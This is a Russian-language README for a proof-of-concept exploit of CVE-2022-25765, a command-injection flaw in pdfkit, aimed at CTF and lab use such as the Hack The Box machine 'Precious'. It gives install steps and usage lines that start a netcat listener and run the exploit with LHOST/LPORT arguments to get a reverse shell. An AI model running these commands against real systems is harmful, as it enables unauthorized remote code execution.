
Python proof-of-concept для CVE-2022-25765 — уязвимости внедрения команд в pdfkit, позволяющей удалённое выполнение кода через специально сформированную генерацию PDF.
PoC для CVE-2022-25765, затрагивающий уязвимые версии pdfkit.
Протестировано с pdfkit 0.8.6.
requestscoloramaУстановка зависимостей:
pip3 install -r requirements.txt
Или вручную:
pip3 install requests colorama
python3 exploit2.py -u <TARGET> -l <LHOST> -p <LPORT>
Пример: Запустите слушатель
nc -lvnp 4242
python3 exploit2.py -u http://10.10.10.10 -l 10.10.14.5 -p 4444
Клонируйте репозиторий:
git clone [email protected]:innocentx0/CVE-2022-25765.git
cd CVE-2022-25765
Установите зависимости:
pip3 install -r requirements.txt
Запустите PoC против вашей лабораторной цели.
CVE-2022-25765 — это уязвимость внедрения команд в уязвимых версиях pdfkit.
Проблема связана с недостаточной санитизацией пользовательского ввода, передаваемого в процесс генерации PDF.
Данный PoC создан в основном для обучения и сред CTF/лабораторий.
Если вы ищете место, где можно его опробовать, — Hack The Box: Машина: Precious.
Используйте это только против систем, которыми вы владеете или на тестирование которых имеете явное разрешение.
Я не несу ответственности за неправомерное использование или ущерб, причинённый данным проектом.
INNOCENTx0